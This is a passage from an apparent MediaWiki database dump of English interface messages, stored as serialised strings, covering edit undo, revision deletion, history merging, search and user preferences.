depth.\";'),('en','messages:expansion-depth-exceeded-warning','s:33:\"Page exceeded the expansion depth\";'),('en','messages:parser-unstrip-loop-warning','s:21:\"Unstrip loop detected\";'),('en','messages:parser-unstrip-recursion-limit','s:37:\"Unstrip recursion limit exceeded ($1)\";'),('en','messages:converter-manual-rule-error','s:49:\"Error detected in manual language conversion rule\";'),('en','messages:undo-success','s:161:\"The edit can be undone.\nPlease check the comparison below to verify that this is what you want to do, and then save the changes below to finish undoing the edit.\";'),('en','messages:undo-failure','s:67:\"The edit could not be undone due to conflicting intermediate edits.\";'),('en','messages:undo-norev','s:70:\"The edit could not be undone because it does not exist or was deleted.\";'),('en','messages:undo-nochange','s:45:\"The edit appears to have already been undone.\";'),('en','messages:undo-summary','s:75:\"Undo revision $1 by [[Special:Contributions/$2|$2]] ([[User talk:$2|talk]])\";'),('en','messages:undo-summary-username-hidden','s:33:\"Undo revision $1 by a hidden user\";'),('en','messages:cantcreateaccounttitle','s:21:\"Cannot create account\";'),('en','messages:cantcreateaccount-text','s:134:\"Account creation from this IP address ($1) has been blocked by [[User:$3|$3]].\n\nThe reason given by $3 is $2\";'),('en','messages:cantcreateaccount-range-text','s:170:\"Account creation from IP addresses in the range \'\'\'$1\'\'\', which includes your IP address (\'\'\'$4\'\'\'), has been blocked by [[User:$3|$3]].\n\nThe reason given by $3 is \'\'$2\'\'\";'),('en','messages:createaccount-hook-aborted','s:2:\"$1\";'),('en','messages:viewpagelogs','s:23:\"View logs for this page\";'),('en','messages:nohistory','s:39:\"There is no edit history for this page.\";'),('en','messages:currentrev','s:15:\"Latest revision\";'),('en','messages:currentrev-asof','s:24:\"Latest revision as of $1\";'),('en','messages:revisionasof','s:17:\"Revision as of $1\";'),('en','messages:revision-info','s:39:\"Revision as of $1 by {{GENDER:$6|$2}}$7\";'),('en','messages:revision-info-current','s:1:\"-\";'),('en','messages:revision-nav','s:65:\"($1) $2{{int:pipe-separator}}$3 ($4){{int:pipe-separator}}$5 ($6)\";'),('en','messages:previousrevision','s:18:\"← Older revision\";'),('en','messages:nextrevision','s:18:\"Newer revision →\";'),('en','messages:currentrevisionlink','s:15:\"Latest revision\";'),('en','messages:cur','s:3:\"cur\";'),('en','messages:next','s:4:\"next\";'),('en','messages:last','s:4:\"prev\";'),('en','messages:page_first','s:5:\"first\";'),('en','messages:page_last','s:4:\"last\";'),('en','messages:histlegend','s:312:\"Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
                                                                \nLegend: ({{int:cur}}) = difference with latest revision, ({{int:last}}) = difference with preceding revision, {{int:minoreditletter}} = minor edit.\";'),('en','messages:history-fieldset-title','s:14:\"Browse history\";'),('en','messages:history-show-deleted','s:12:\"Deleted only\";'),('en','messages:history_copyright','s:1:\"-\";'),('en','messages:histfirst','s:6:\"oldest\";'),('en','messages:histlast','s:6:\"newest\";'),('en','messages:historysize','s:31:\"({{PLURAL:$1|1 byte|$1 bytes}})\";'),('en','messages:historyempty','s:7:\"(empty)\";'),('en','messages:history-feed-title','s:16:\"Revision history\";'),('en','messages:history-feed-description','s:42:\"Revision history for this page on the wiki\";'),('en','messages:history-feed-item-nocomment','s:8:\"$1 at $2\";'),('en','messages:history-feed-empty','s:155:\"The requested page does not exist.\nIt may have been deleted from the wiki, or renamed.\nTry [[Special:Search|searching on the wiki]] for relevant new pages.\";'),('en','messages:rev-deleted-comment','s:22:\"(edit summary removed)\";'),('en','messages:rev-deleted-user','s:18:\"(username removed)\";'),('en','messages:rev-deleted-event','s:21:\"(log details removed)\";'),('en','messages:rev-deleted-user-contribs','s:65:\"[username or IP address removed - edit hidden from contributions]\";'),('en','messages:rev-deleted-text-permission','s:156:\"This page revision has been deleted.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} deletion log].\";'),('en','messages:rev-suppressed-text-permission','s:164:\"This page revision has been suppressed.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} suppression log].\";'),('en','messages:rev-deleted-text-unhide','s:218:\"This page revision has been deleted.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} deletion log].\nYou can still [$1 view this revision] if you wish to proceed.\";'),('en','messages:rev-suppressed-text-unhide','s:226:\"This page revision has been suppressed.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} suppression log].\nYou can still [$1 view this revision] if you wish to proceed.\";'),('en','messages:rev-deleted-text-view','s:173:\"This page revision has been deleted.\nYou can view it; details can be found in the [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} deletion log].\";'),('en','messages:rev-suppressed-text-view','s:181:\"This page revision has been suppressed.\nYou can view it; details can be found in the [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} suppression log].\";'),('en','messages:rev-deleted-no-diff','s:192:\"You cannot view this diff because one of the revisions has been deleted.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} deletion log].\";'),('en','messages:rev-suppressed-no-diff','s:89:\"You cannot view this diff because one of the revisions has been deleted.\";'),('en','messages:rev-deleted-unhide-diff','s:229:\"One of the revisions of this diff has been deleted.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} deletion log].\nYou can still [$1 view this diff] if you wish to proceed.\";'),('en','messages:rev-suppressed-unhide-diff','s:237:\"One of the revisions of this diff has been suppressed.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} suppression log].\nYou can still [$1 view this diff] if you wish to proceed.\";'),('en','messages:rev-deleted-diff-view','s:195:\"One of the revisions of this diff has been deleted.\nYou can view this diff; details can be found in the [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} deletion log].\";'),('en','messages:rev-suppressed-diff-view','s:203:\"One of the revisions of this diff has been suppressed.\nYou can view this diff; details can be found in the [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} suppression log].\";'),('en','messages:rev-delundel','s:17:\"change visibility\";'),('en','messages:rev-showdeleted','s:4:\"show\";'),('en','messages:revisiondelete','s:25:\"Delete/undelete revisions\";'),('en','messages:revdelete-nooldid-title','s:23:\"Invalid target revision\";'),('en','messages:revdelete-nooldid-text','s:167:\"You have either not specified a target revision(s) to perform this\nfunction, the specified revision does not exist, or you are attempting to hide the current revision.\";'),('en','messages:revdelete-no-file','s:34:\"The file specified does not exist.\";'),('en','messages:revdelete-show-file-confirm','s:97:\"Are you sure you want to view a deleted revision of the file \"$1\" from $2 at $3?\";'),('en','messages:revdelete-show-file-submit','s:3:\"Yes\";'),('en','messages:revdelete-selected-text','s:62:\"{{PLURAL:$1|Selected revision|Selected revisions}} of [[:$2]]:\";'),('en','messages:revdelete-selected-file','s:70:\"{{PLURAL:$1|Selected file version|Selected file versions}} of [[:$2]]:\";'),('en','messages:logdelete-selected','s:53:\"{{PLURAL:$1|Selected log event|Selected log events}}:\";'),('en','messages:revdelete-text-text','s:119:\"Deleted revisions will still appear in the page history, but parts of their content will be inaccessible to the public.\";'),('en','messages:revdelete-text-file','s:123:\"Deleted file versions will still appear in the file history, but parts of their content will be inaccessible to the public.\";'),('en','messages:logdelete-text','s:112:\"Deleted log events will still appear in the logs, but parts of their content will be inaccessible to the public.\";'),('en','messages:revdelete-text-others','s:128:\"Other administrators will still be able to access the hidden content and to undelete it, unless additional restrictions are set.\";'),('en','messages:revdelete-confirm','s:168:\"Please confirm that you intend to do this, that you understand the consequences, and that you are doing this in accordance with [[{{MediaWiki:Policy-url}}|the policy]].\";'),('en','messages:revdelete-suppress-text','s:233:\"Suppression should only be used for the following cases:\n* potentially libelous information\n* inappropriate personal information\n*: home addresses and telephone numbers, national identification numbers, etc.\";'),('en','messages:revdelete-legend','s:27:\"Set visibility restrictions\";'),('en','messages:revdelete-hide-text','s:13:\"Revision text\";'),('en','messages:revdelete-hide-image','s:17:\"Hide file content\";'),('en','messages:revdelete-hide-name','s:26:\"Hide target and parameters\";'),('en','messages:revdelete-hide-comment','s:12:\"Edit summary\";'),('en','messages:revdelete-hide-user','s:28:\"Editor\'s username/IP address\";'),('en','messages:revdelete-hide-restricted','s:51:\"Suppress data from administrators as well as others\";'),('en','messages:revdelete-radio-same','s:15:\"(do not change)\";'),('en','messages:revdelete-radio-set','s:6:\"Hidden\";'),('en','messages:revdelete-radio-unset','s:7:\"Visible\";'),('en','messages:revdelete-suppress','s:51:\"Suppress data from administrators as well as others\";'),('en','messages:revdelete-unsuppress','s:41:\"Remove restrictions on restored revisions\";'),('en','messages:revdelete-log','s:7:\"Reason:\";'),('en','messages:revdelete-submit','s:50:\"Apply to selected {{PLURAL:$1|revision|revisions}}\";'),('en','messages:revdelete-success','s:58:\"Revision visibility successfully updated.\";'),('en','messages:revdelete-failure','s:61:\"Revision visibility could not be updated:\n$1\";'),('en','messages:logdelete-success','s:49:\"Log visibility successfully set.\";'),('en','messages:logdelete-failure','s:52:\"Log visibility could not be set:\n$1\";'),('en','messages:revdel-restore','s:17:\"change visibility\";'),('en','messages:pagehist','s:12:\"Page history\";'),('en','messages:deletedhist','s:15:\"Deleted history\";'),('en','messages:revdelete-hide-current','s:86:\"Error hiding the item dated $2, $1: This is the current revision.\nIt cannot be hidden.\";'),('en','messages:revdelete-show-no-access','s:106:\"Error showing the item dated $2, $1: This item has been marked \"restricted\".\nYou do not have access to it.\";'),('en','messages:revdelete-modify-no-access','s:108:\"Error modifying the item dated $2, $1: This item has been marked \"restricted\".\nYou do not have access to it.\";'),('en','messages:revdelete-modify-missing','s:60:\"Error modifying item ID $1: It is missing from the database!\";'),('en','messages:revdelete-no-change','s:94:\"Warning: The item dated $2, $1 already had the requested visibility settings.\";'),('en','messages:revdelete-concurrent-change','s:151:\"Error modifying the item dated $2, $1: Its status appears to have been changed by someone else while you attempted to modify it.\nPlease check the logs.\";'),('en','messages:revdelete-only-restricted','s:149:\"Error hiding the item dated $2, $1: You cannot suppress items from view by administrators without also selecting one of the other visibility options.\";'),('en','messages:revdelete-reason-dropdown','s:156:\"*Common delete reasons\n** Copyright violation\n** Inappropriate comment or personal information\n** Inappropriate username\n** Potentially libelous information\";'),('en','messages:revdelete-otherreason','s:24:\"Other/additional reason:\";'),('en','messages:revdelete-reasonotherlist','s:12:\"Other reason\";'),('en','messages:revdelete-edit-reasonlist','s:19:\"Edit delete reasons\";'),('en','messages:revdelete-offender','s:16:\"Revision author:\";'),('en','messages:suppressionlog','s:15:\"Suppression log\";'),('en','messages:suppressionlogtext','s:181:\"Below is a list of deletions and blocks involving content hidden from administrators.\nSee the [[Special:BlockList|block list]] for the list of currently operational bans and blocks.\";'),('en','messages:mergehistory','s:20:\"Merge page histories\";'),('en','messages:mergehistory-header','s:156:\"This page lets you merge revisions of the history of one source page into a newer page.\nMake sure that this change will maintain historical page continuity.\";'),('en','messages:mergehistory-box','s:29:\"Merge revisions of two pages:\";'),('en','messages:mergehistory-from','s:12:\"Source page:\";'),('en','messages:mergehistory-into','s:17:\"Destination page:\";'),('en','messages:mergehistory-list','s:22:\"Mergeable edit history\";'),('en','messages:mergehistory-merge','s:224:\"The following revisions of [[:$1]] can be merged into [[:$2]].\nUse the radio button column to merge in only the revisions created at and before the specified time.\nNote that using the navigation links will reset this column.\";'),('en','messages:mergehistory-go','s:20:\"Show mergeable edits\";'),('en','messages:mergehistory-submit','s:15:\"Merge revisions\";'),('en','messages:mergehistory-empty','s:27:\"No revisions can be merged.\";'),('en','messages:mergehistory-success','s:80:\"$3 {{PLURAL:$3|revision|revisions}} of [[:$1]] successfully merged into [[:$2]].\";'),('en','messages:mergehistory-fail','s:77:\"Unable to perform history merge, please recheck the page and time parameters.\";'),('en','messages:mergehistory-fail-toobig','s:109:\"Unable to perform history merge as more than the limit of $1 {{PLURAL:$1|revision|revisions}} would be moved.\";'),('en','messages:mergehistory-no-source','s:30:\"Source page $1 does not exist.\";'),('en','messages:mergehistory-no-destination','s:35:\"Destination page $1 does not exist.\";'),('en','messages:mergehistory-invalid-source','s:34:\"Source page must be a valid title.\";'),('en','messages:mergehistory-invalid-destination','s:39:\"Destination page must be a valid title.\";'),('en','messages:mergehistory-autocomment','s:27:\"Merged [[:$1]] into [[:$2]]\";'),('en','messages:mergehistory-comment','s:31:\"Merged [[:$1]] into [[:$2]]: $3\";'),('en','messages:mergehistory-same-destination','s:47:\"Source and destination pages cannot be the same\";'),('en','messages:mergehistory-reason','s:7:\"Reason:\";'),('en','messages:mergehistory-revisionrow','s:23:\"$1 ($2) $3 . . $4 $5 $6\";'),('en','messages:mergelog','s:9:\"Merge log\";'),('en','messages:pagemerge-logentry','s:46:\"merged [[$1]] into [[$2]] (revisions up to $3)\";'),('en','messages:revertmerge','s:7:\"Unmerge\";'),('en','messages:mergelogpagetext','s:75:\"Below is a list of the most recent merges of one page history into another.\";'),('en','messages:history-title','s:24:\"Revision history of \"$1\"\";'),('en','messages:difference-title','s:36:\"Difference between revisions of \"$1\"\";'),('en','messages:difference-title-multipage','s:38:\"Difference between pages \"$1\" and \"$2\"\";'),('en','messages:difference-multipage','s:26:\"(Difference between pages)\";'),('en','messages:lineno','s:8:\"Line $1:\";'),('en','messages:compareselectedversions','s:26:\"Compare selected revisions\";'),('en','messages:showhideselectedversions','s:39:\"Change visibility of selected revisions\";'),('en','messages:editundo','s:4:\"undo\";'),('en','messages:diff-empty','s:15:\"(No difference)\";'),('en','messages:diff-multi-sameuser','s:94:\"({{PLURAL:$1|One intermediate revision|$1 intermediate revisions}} by the same user not shown)\";'),('en','messages:diff-multi-otherusers','s:118:\"({{PLURAL:$1|One intermediate revision|$1 intermediate revisions}} by {{PLURAL:$2|one other user|$2 users}} not shown)\";'),('en','messages:diff-multi-manyusers','s:118:\"({{PLURAL:$1|One intermediate revision|$1 intermediate revisions}} by more than $2 {{PLURAL:$2|user|users}} not shown)\";'),('en','messages:difference-missing-revision','s:292:\"{{PLURAL:$2|One revision|$2 revisions}} of this difference ($1) {{PLURAL:$2|was|were}} not found.\n\nThis is usually caused by following an outdated diff link to a page that has been deleted.\nDetails can be found in the [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} deletion log].\";'),('en','messages:search-summary','s:0:\"\";'),('en','messages:searchresults','s:14:\"Search results\";'),('en','messages:searchresults-title','s:23:\"Search results for \"$1\"\";'),('en','messages:titlematches','s:18:\"Page title matches\";'),('en','messages:textmatches','s:17:\"Page text matches\";'),('en','messages:notextmatches','s:20:\"No page text matches\";'),('en','messages:prevn','s:25:\"previous {{PLURAL:$1|$1}}\";'),('en','messages:nextn','s:21:\"next {{PLURAL:$1|$1}}\";'),('en','messages:prevn-title','s:40:\"Previous $1 {{PLURAL:$1|result|results}}\";'),('en','messages:nextn-title','s:36:\"Next $1 {{PLURAL:$1|result|results}}\";'),('en','messages:shown-title','s:45:\"Show $1 {{PLURAL:$1|result|results}} per page\";'),('en','messages:viewprevnext','s:40:\"View ($1 {{int:pipe-separator}} $2) ($3)\";'),('en','messages:searchmenu-exists','s:120:\"There is a page named \"[[:$1]]\" on this wiki. {{PLURAL:$2|0=|See also the other search results found.}}\";'),('en','messages:searchmenu-new','s:150:\"Create the page \"[[:$1]]\" on this wiki! {{PLURAL:$2|0=|See also the page found with your search.|See also the search results found.}}\";'),('en','messages:searchmenu-new-nocreate','s:0:\"\";'),('en','messages:searchprofile-articles','s:13:\"Content pages\";'),('en','messages:searchprofile-images','s:10:\"Multimedia\";'),('en','messages:searchprofile-everything','s:10:\"Everything\";'),('en','messages:searchprofile-advanced','s:8:\"Advanced\";'),('en','messages:searchprofile-articles-tooltip','s:12:\"Search in $1\";'),('en','messages:searchprofile-images-tooltip','s:16:\"Search for files\";'),('en','messages:searchprofile-everything-tooltip','s:44:\"Search all of content (including talk pages)\";'),('en','messages:searchprofile-advanced-tooltip','s:27:\"Search in custom namespaces\";'),('en','messages:search-result-size','s:34:\"$1 ({{PLURAL:$2|1 word|$2 words}})\";'),('en','messages:search-result-category-size','s:111:\"{{PLURAL:$1|1 member|$1 members}} ({{PLURAL:$2|1 subcategory|$2 subcategories}}, {{PLURAL:$3|1 file|$3 files}})\";'),('en','messages:search-redirect','s:13:\"(redirect $1)\";'),('en','messages:search-section','s:12:\"(section $1)\";'),('en','messages:search-file-match','s:22:\"(matches file content)\";'),('en','messages:search-suggest','s:16:\"Did you mean: $1\";'),('en','messages:search-interwiki-caption','s:15:\"Sister projects\";'),('en','messages:search-interwiki-default','s:16:\"Results from $1:\";'),('en','messages:search-interwiki-custom','s:0:\"\";'),('en','messages:search-interwiki-more','s:6:\"(more)\";'),('en','messages:search-relatedarticle','s:7:\"Related\";'),('en','messages:searchrelated','s:7:\"related\";'),('en','messages:searchall','s:3:\"all\";'),('en','messages:showingresults','s:123:\"Showing below up to {{PLURAL:$1|1 result|$1 results}} starting with #$2.\";'),('en','messages:showingresultsinrange','s:142:\"Showing below up to {{PLURAL:$1|1 result|$1 results}} in range #$2 to #$3.\";'),('en','messages:search-showingresults','s:119:\"{{PLURAL:$4|Result $1 of $3|Results $1 - $2 of $3}}\";'),('en','messages:search-nonefound','s:41:\"There were no results matching the query.\";'),('en','messages:powersearch-legend','s:15:\"Advanced search\";'),('en','messages:powersearch-ns','s:21:\"Search in namespaces:\";'),('en','messages:powersearch-togglelabel','s:6:\"Check:\";'),('en','messages:powersearch-toggleall','s:3:\"All\";'),('en','messages:powersearch-togglenone','s:4:\"None\";'),('en','messages:powersearch-remember','s:38:\"Remember selection for future searches\";'),('en','messages:search-external','s:15:\"External search\";'),('en','messages:searchdisabled','s:143:\"{{SITENAME}} search is disabled.\nYou can search via Google in the meantime.\nNote that their indexes of {{SITENAME}} content may be out of date.\";'),('en','messages:googlesearch','s:630:\"
                                                                \n \n \n \n \n\n \n \n
                                                                \n \n \n
                                                                \n
                                                                \";'),('en','messages:search-error','s:41:\"An error has occurred while searching: $1\";'),('en','messages:opensearch-desc','s:34:\"{{SITENAME}} ({{CONTENTLANGUAGE}})\";'),('en','messages:preferences','s:11:\"Preferences\";'),('en','messages:preferences-summary','s:0:\"\";'),('en','messages:mypreferences','s:11:\"Preferences\";'),('en','messages:prefs-edits','s:16:\"Number of edits:\";'),('en','messages:prefsnologintext2','s:41:\"Please log in to change your preferences.\";'),('en','messages:prefs-skin','s:4:\"Skin\";'),('en','messages:skin-preview','s:7:\"Preview\";'),('en','messages:datedefault','s:13:\"No preference\";'),('en','messages:prefs-labs','s:13:\"Labs features\";'),('en','messages:prefs-user-pages','s:10:\"User pages\";'),('en','messages:prefs-personal','s:12:\"User profile\";'),('en','messages:prefs-rc','s:14:\"Recent changes\";'),('en','messages:prefs-watchlist','s:9:\"Watchlist\";'),('en','messages:prefs-watchlist-days','s:26:\"Days to show in watchlist:\";'),('en','messages:prefs-watchlist-days-max','s:33:\"Maximum $1 {{PLURAL:$1|day|days}}\";'),('en','messages:prefs-watchlist-edits','s:56:\"Maximum number of changes to show in expanded watchlist:\";'),('en','messages:prefs-watchlist-edits-max','s:20:\"Maximum number: 1000\";'),('en','messages:prefs-watchlist-token','s:16:\"Watchlist token:\";'),('en','messages:prefs-misc','s:4:\"Misc\";'),('en','messages:prefs-resetpass','s:15:\"Change password\";'),('en','messages:prefs-changeemail','s:20:\"Change email address\";'),('en','messages:prefs-setemail','s:20:\"Set an email address\";'),('en','messages:prefs-email','s:13:\"Email options\";'),('en','messages:prefs-rendering','s:10:\"Appearance\";'),('en','messages:saveprefs','s:4:\"Save\";'),('en','messages:restoreprefs','s:46:\"Restore all default settings (in all sections)\";'),('en','messages:prefs-editing','s:7:\"Editing\";'),('en','messages:rows','s:5:\"Rows:\";'),('en','messages:columns','s:8:\"Columns:\";'),('en','messages:searchresultshead','s:6:\"Search\";'),('en','messages:stub-threshold','s:72:\"Threshold for stub link formatting (bytes):\";'),('en','messages:stub-threshold-disabled','s:8:\"Disabled\";'),('en','messages:recentchangesdays','s:31:\"Days to show in recent changes:\";'),('en','messages:recentchangesdays-max','s:33:\"Maximum $1 {{PLURAL:$1|day|days}}\";'),('en','messages:recentchangescount','s:35:\"Number of edits to show by default:\";'),('en','messages:prefs-help-recentchangescount','s:55:\"This includes recent changes, page histories, and logs.\";'),('en','messages:prefs-help-watchlist-token2','s:192:\"This is the secret key to the web feed of your watchlist.\nAnyone who knows it will be able to read your watchlist, so do not share it.\nIf you need to, [[Special:ResetTokens|you can reset it]].\";'),('en','messages:savedprefs','s:33:\"Your preferences have been saved.\";'),('en','messages:timezonelegend','s:10:\"Time zone:\";'),('en','messages:localtime','s:11:\"Local time:\";'),('en','messages:timezoneuseserverdefault','s:21:\"Use wiki default ($1)\";'),('en','messages:timezoneuseoffset','s:22:\"Other (specify offset)\";'),('en','messages:servertime','s:12:\"Server time:\";'),('en','messages:guesstimezone','s:20:\"Fill in from browser\";'),('en','messages:timezoneregion-africa','s:6:\"Africa\";'),('en','messages:timezoneregion-america','s:7:\"America\";'),('en','messages:timezoneregion-antarctica','s:10:\"Antarctica\";'),('en','messages:timezoneregion-arctic','s:6:\"Arctic\";'),('en','messages:timezoneregion-asia','s:4:\"Asia\";'),('en','messages:timezoneregion-atlantic','s:14:\"Atlantic Ocean\";'),('en','messages:timezoneregion-australia','s:9:\"Australia\";'),('en','messages:timezoneregion-europe','s:6:\"Europe\";'),('en','messages:timezoneregion-indian','s:12:\"Indian Ocean\";'),('en','messages:timezoneregion-pacific','s:13:\"Pacific Ocean\";'),('en','messages:allowemail','s:29:\"Enable email from other users\";'),('en','messages:prefs-searchoptions','s:6:\"Search\";'),('en','messages:prefs-namespaces','s:10:\"Namespaces\";'),('en','messages:default','s:7:\"default\";'),('en','messages:prefs-files','s:5:\"Files\";'),('en','messages:prefs-custom-css','s:10:\"Custom CSS\";'),('en','messages:prefs-custom-js','s:17:\"Custom JavaScript\";'),('en','messages:prefs-common-css-js','s:36:\"Shared CSS/JavaScript for all skins:\";'),('en','messages:prefs-reset-intro','s:92:\"You can use this page to reset your preferences to the site defaults.\nThis cannot be undone.\";'),('en','messages:prefs-emailconfirm-label','s:19:\"Email confirmation:\";'),('en','messages:youremail','s:6:\"Email:\";'),('en','messages:username','s:23:\"{{GENDER:$1|Username}}:\";'),('en','messages:prefs-memberingroups','s:51:\"{{GENDER:$2|Member}} of {{PLURAL:$1|group|groups}}:\";'),('en','messages:prefs-memberingroups-type','s:2:\"$1\";'),('en','messages:prefs-registration','s:18:\"Registration time:\";'),('en','messages:prefs-registration-date-time','s:2:\"$1\";'),('en','messages:yourrealname','s:10:\"Real name:\";'),('en','messages:yourlanguage','s:9:\"Language:\";'),('en','messages:yourvariant','s:25:\"Content language variant:\";'),('en','messages:prefs-help-variant','s:83:\"Your preferred variant or orthography to display the content pages of this wiki in.\";'),('en','messages:yournick','s:14:\"New signature:\";'),('en','messages:prefs-help-signature','s:130:\"Comments on talk pages should be signed with \"~~~~\", which will be converted into your signature and a timestamp.\";'),('en','messages:badsig','s:39:\"Invalid raw signature.\nCheck HTML tags.\";'),('en','messages:badsiglength','s:96:\"Your signature is too long.\nIt must not be more than $1 {{PLURAL:$1|character|characters}} long.\";'),('en','messages:yourgender','s:34:\"How do you prefer to be described?\";'),('en','messages:gender-unknown','s:19:\"I prefer not to say\";'),('en','messages:gender-male','s:19:\"He edits wiki pages\";'),('en','messages:gender-female','s:20:\"She edits wiki pages\";'),('en','messages:prefs-help-gender','s:183:\"Setting this preference is optional.\nThe software uses its value to address you and to mention you to others using the appropriate grammatical gender.\nThis information will be public.\";'),('en','messages:email','s:5:\"Email\";'),('en','messages:prefs-help-realname','s:111:\"Real name is optional.\nIf you choose to provide it, this will be used for giving you attribution for your work.\";'),('en','messages:prefs-help-email','s:94:\"Email address is optional, but is needed for password resets, should you forget your password.\";'),('en','messages:prefs-help-email-others','s:161:\"You can also choose to let others contact you by email through a link on your user or talk page.\nYour email address is not revealed when other users contact you.\";'),('en','messages:prefs-help-email-required','s:26:\"Email address is required.\";'),('en','messages:prefs-info','s:17:\"Basic information\";'),('en','messages:prefs-i18n','s:20:\"Internationalisation\";'),('en','messages:prefs-signature','s:9:\"Signature\";'),('en','messages:prefs-dateformat','s:11:\"Date format\";'),('en','messages:prefs-timeoffset','s:11:\"Time offset\";'),('en','messages:prefs-advancedediting','s:15:\"General options\";'),('en','messages:prefs-editor','s:6:\"Editor\";'),('en','messages:prefs-preview','s:7:\"Preview\";'),('en','messages:prefs-advancedrc','s:16:\"Advanced options\";'),('en','messages:prefs-advancedrendering','s:16:\"Advanced options\";'),('en','messages:prefs-advancedsearchoptions','s:16:\"Advanced options\";'),('en','messages:prefs-advancedwatchlist','s:16:\"Advanced options\";'),('en','messages:prefs-displayrc','s:15:\"Display options\";'),('en','messages:prefs-displaywatchlist','s:15:\"Display options\";'),('en','messages:prefs-tokenwatchlist','s:5:\"Token\";'),('en','messages:prefs-diffs','s:5:\"Diffs\";'),('en','messages:prefs-help-prefershttps','s:52:\"This preference will take effect on your next login.\";'),('en','messages:prefswarning-warning','s:152:\"You\'ve made changes to your preferences that have not been saved yet.\nIf you leave this page without clicking \"$1\" your preferences will not be updated.\";'),('en','messages:prefs-tabs-navigation-hint','s:93:\"Tip: You can use the left and right arrow keys to navigate between the tabs in the tabs list.\";'),('en','messages:email-address-validity-valid','s:27:\"Email address appears valid\";'),('en','messages:email-address-validity-invalid','s:27:\"Enter a valid email address\";'),('en','messages:userrights','s:22:\"User rights management\";'),('en','messages:userrights-summary','s:0:\"\";'),('en','messages:userrights-lookup-user','s:18:\"Manage user groups\";'),('en','messages:userrights-user-editname','s:17:\"Enter a username:\";'),('en','messages:editusergroup','s:16:\"Edit user groups\";'),('en','messages:editinguser','s:63:\"Changing user rights of user [[User:$1|$1]] $2\";'),('en','messages:userrights-editusergroup','s:16:\"Edit user groups\";'),('en','messages:saveusergroups','s:16:\"Save user groups\";'),('en','messages:userrights-groupsmember','s:10:\"Member of:\";'),('en','messages:userrights-groupsmember-auto','s:19:\"Implicit member of:\";'),('en','messages:userrights-groupsmember-type','s:2:\"$1\";'),('en','messages:userrights-groups-help','s:234:\"You may alter the groups this user is in:\n* A checked box means the user is in that group.\n* An unchecked box means the user is not in that group.\n* A * indicates that you cannot remove the group once you have added it, or vice versa.\";'),('en','messages:userrights-reason','s:7:\"Reason:\";'),('en','messages:userrights-no-interwiki','s:62:\"You do not have permission to edit user rights on other wikis.\";'),('en','messages:userrights-nodatabase','s:43:\"Database $1 does not exist or is not local.\";'),('en','messages:userrights-nologin','s:90:\"You must [[Special:UserLogin|log in]] with an administrator account to assign user rights.\";'),('en','messages:userrights-notallowed','s:56:\"You do not have permission to add or remove user rights.\";'),('en','messages:userrights-changeable-col','s:21:\"Groups you can change\";'),('en','messages:userrights-unchangeable-col','s:24:\"Groups you cannot change\";'),('en','messages:userrights-irreversible-marker','s:3:\"$1*\";'),('en','messages:userrights-conflict','s:72:\"Conflict of user rights changes! Please review and confirm your changes.\";'),('en','messages:userrights-removed-self','s:94:\"You successfully removed your own rights. As such, you are no longer able to access this page.\";'),('en','messages:group','s:6:\"Group:\";'),('en','messages:group-user','s:5:\"Users\";'),('en','messages:group-autoconfirmed','s:19:\"Autoconfirmed users\";'),('en','messages:group-bot','s:4:\"Bots\";'),('en','messages:group-sysop','s:14:\"Administrators\";'),('en','messages:group-bureaucrat','s:11:\"Bureaucrats\";'),('en','messages:group-suppress','s:10:\"Oversights\";'),('en','messages:group-all','s:5:\"(all)\";'),('en','messages:group-user-member','s:18:\"{{GENDER:$1|user}}\";'),('en','messages:group-autoconfirmed-member','s:32:\"{{GENDER:$1|autoconfirmed user}}\";'),('en','messages:group-bot-member','s:17:\"{{GENDER:$1|bot}}\";'),('en','messages:group-sysop-member','s:27:\"{{GENDER:$1|administrator}}\";'),('en','messages:group-bureaucrat-member','s:24:\"{{GENDER:$1|bureaucrat}}\";'),('en','messages:group-suppress-member','s:23:\"{{GENDER:$1|oversight}}\";'),('en','messages:grouppage-user','s:20:\"{{ns:project}}:Users\";'),('en','messages:grouppage-autoconfirmed','s:34:\"{{ns:project}}:Autoconfirmed users\";'),('en','messages:grouppage-bot','s:19:\"{{ns:project}}:Bots\";'),('en','messages:grouppage-sysop','s:29:\"{{ns:project}}:Administrators\";'),('en','messages:grouppage-bureaucrat','s:26:\"{{ns:project}}:Bureaucrats\";'),('en','messages:grouppage-suppress','s:24:\"{{ns:project}}:Oversight\";'),('en','messages:right-read','s:10:\"Read pages\";'),('en','messages:right-edit','s:10:\"Edit pages\";'),('en','messages:right-createpage','s:45:\"Create pages (which are not discussion pages)\";'),('en','messages:right-createtalk','s:23:\"Create discussion pages\";'),('en','messages:right-createaccount','s:24:\"Create new user accounts\";'),('en','messages:right-minoredit','s:19:\"Mark edits as minor\";'),('en','messages:right-move','s:10:\"Move pages\";'),('en','messages:right-move-subpages','s:30:\"Move pages with their subpages\";'),('en','messages:right-move-rootuserpages','s:20:\"Move root user pages\";'),('en','messages:right-move-categorypages','s:19:\"Move category pages\";'),('en','messages:right-movefile','s:10:\"Move files\";'),('en','messages:right-suppressredirect','s:56:\"Not create redirects from source pages when moving pages\";'),('en','messages:right-upload','s:12:\"Upload files\";'),('en','messages:right-reupload','s:24:\"Overwrite existing files\";'),('en','messages:right-reupload-own','s:44:\"Overwrite existing files uploaded by oneself\";'),('en','messages:right-reupload-shared','s:53:\"Override files on the shared media repository locally\";'),('en','messages:right-upload_by_url','s:23:\"Upload files from a URL\";'),('en','messages:right-purge','s:52:\"Purge the site cache for a page without confirmation\";'),('en','messages:right-autoconfirmed','s:39:\"Not be affected by IP-based rate 